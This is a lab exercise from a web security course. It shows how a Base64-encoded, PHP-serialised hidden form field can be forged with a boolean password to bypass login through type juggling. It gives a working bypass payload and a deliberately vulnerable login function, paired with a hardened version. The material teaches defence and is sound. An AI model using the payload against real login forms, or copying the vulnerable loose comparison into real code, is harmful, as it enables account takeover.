Challenge #4: What About Serialization?
This is a demo module, sign up for the course here!
It's not just JSON that lets us exploit Type Juggling vulnerabilities by controlling data types. Any serialisation format that can express types, and that the application parses back into native values (in PHP or any other language), can be used to exploit Type Juggling vulnerabilities.
As long as we can control the data types, we can manipulate the input to trigger the vulnerability.
Your Challenge
As the final challenge in this module, I'm leaving you to figure out all the details yourself...
As always, if you don't know where to start, check out the hints...
Objectives
- Identify the vulnerable input and manipulate the payload to gain access to Pippin's account.
Hint #1
Unlike previous challenges, you're not looking for a query parameter or JSON payload...
Hint #2
The button should indicate the potential for a Form, which means there could be hidden fields...
Hint #3
When you view the source of the page, you should see something that looks like this:
<form method="POST">
<input type="hidden" name="_token" value="...">
<input type="hidden" name="payload" id="payload" value="YToyOntzOjg6InVzZXJuYW1lIjtzOjU6Im1lcnJ5IjtzOjg6InBhc3N3b3JkIjtzOjEwOiJicmFuZHlidWNrIjt9">
<p><button type="submit">Please click to continue...</button></p>
</form>
The only interesting thing here is that payload hidden field, with that suspiciously familiar-looking string...
Hint #4
Hopefully you've figured out that the payload in the hidden field is a Base64 string.
We can decode it to get this:
> base64_decode('YToyOntzOjg6InVzZXJuYW1lIjtzOjU6Im1lcnJ5IjtzOjg6InBhc3N3b3JkIjtzOjEwOiJicmFuZHlidWNrIjt9');
= "a:2:{s:8:"username";s:5:"merry";s:8:"password";s:10:"brandybuck";}"
Which, if you're not familiar with PHP serialisation, is a PHP array with two key-value pairs, serialised using the serialize() function. It's a common way to store data in PHP, because it preserves complex data structures and, crucially for us, the data type of every value: unserialize() hands back exactly the types encoded in the string. The s:5 and s:10 signify string values of specific lengths (5 and 10 bytes respectively; a length prefix that doesn't match the content makes unserialize() fail), while the leading a:2: signifies an array with 2 elements. Other types have their own prefixes, and the one we care about is b, used for boolean values (b:1; is true, b:0; is false).
This data structure should be familiar if you've completed Challenge #3, you just need to join the dots now.
Solution
Using the same Boolean type-juggling trick from Challenge #3, we can build our own custom payload to gain access to Pippin's account.
> $payload = ['username' => 'pippin', 'password' => true];
> $serialised = serialize($payload);
= "a:2:{s:8:"username";s:6:"pippin";s:8:"password";b:1;}"
> base64_encode($serialised);
= "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6InBpcHBpbiI7czo4OiJwYXNzd29yZCI7YjoxO30="
This payload can then be injected into the hidden field, replacing the existing value, using the browser inspector, and the form submitted to the server. If you've generated a working payload, you'll get a success message!
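To join the dots end to end, here is an added example in plain PHP. It is not code from the challenge app (whose login handler isn't shown on this page); it reconstructs the behaviour the challenge implies, unserialising the hidden field and comparing the password with ==, and sets a hardened version beside it that refuses anything but strings before comparing. The demoUser() record, its 'correct-horse' password and the function names are all assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Constructed demo record standing in for Pippin's database row (the real app's
// storage is not shown on the page). Assumption for the demo: the stored value is
// the plaintext password, mirroring the challenge payload, which carried "brandybuck"
// in clear. Real apps store a password_hash() and call password_verify(); the type
// check in hardenedLogin() applies either way.
function demoUser(): array
{
    return ['username' => 'pippin', 'password' => 'correct-horse'];
}

// Build the attacker's hidden-field value exactly as the Solution does:
// a serialised array whose password is the boolean true (b:1;), Base64-encoded.
function buildJugglePayload(string $username): string
{
    return base64_encode(serialize(['username' => $username, 'password' => true]));
}

// VULNERABLE (reconstruction of the behaviour the challenge exploits): the
// client-controlled serialised data dictates the types, and the password is compared
// with the loose == operator. When one operand is a bool, PHP casts the other operand
// to bool, so true == "<any non-empty string>" evaluates to true.
function vulnerableLogin(string $b64Payload, array $user): bool
{
    // base64_decode() without strict mode accepts sloppy input; on total garbage it
    // returns false, which strict_types would then reject at unserialize().
    $data = unserialize(base64_decode($b64Payload));

    if ($data['username'] !== $user['username']) {
        return false;
    }

    return $data['password'] == $user['password']; // loose comparison: b:1; wins
}

// HARDENED: validate the transport, forbid object instantiation, and insist on string
// types before any comparison is made.
function hardenedLogin(string $b64Payload, array $user): bool
{
    $raw = base64_decode($b64Payload, true); // strict mode: reject invalid Base64
    if ($raw === false) {
        return false;
    }

    // allowed_classes => false: the payload can no longer instantiate arbitrary classes.
    // The @ silences the notice unserialize() emits on malformed input; it returns
    // false in that case, which the is_array() check below catches.
    $data = @unserialize($raw, ['allowed_classes' => false]);

    if (!is_array($data)
        || !isset($data['username'], $data['password'])
        || !is_string($data['username'])
        || !is_string($data['password'])
    ) {
        return false; // a bool, int or array where a string belongs is rejected outright
    }

    if ($data['username'] !== $user['username']) {
        return false;
    }

    // Both sides are now guaranteed strings, so hash_equals() compares them in constant
    // time with no type coercion. With hashed storage this line becomes password_verify().
    return hash_equals($user['password'], $data['password']);
}

// Demo run: the juggled payload against the vulnerable check, then against the hardened
// check, then a correctly typed password against the hardened check.
$user   = demoUser();
$attack = buildJugglePayload('pippin');
$legit  = base64_encode(serialize(['username' => 'pippin', 'password' => 'correct-horse']));

echo $attack, PHP_EOL;
var_dump(vulnerableLogin($attack, $user));
var_dump(hardenedLogin($attack, $user));
var_dump(hardenedLogin($legit, $user));
```

Run it with `php demo.php`: the first var_dump is true, because true == 'correct-horse' holds under loose comparison, the second is false, because the boolean never reaches the comparison, and the third is true, because a real string password still authenticates. The fix that matters for Type Juggling is the is_string() gate; allowed_classes and strict Base64 decoding are the extra checks a reviewer would expect to see on any endpoint that unserialises user input.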
If you've made it this far and completed all of the challenges, why not Tweet about it, or send a Toot on Mastodon? Let everyone know you're on your way to becoming a hacker and keeping your apps secure!
Don't forget to tag me on Twitter (@valorin) or Mastodon (@[email protected]) so I can see how you're going.
Now that you've solved the challenges, it's time to learn how to defend against these attacks and keep your apps secure!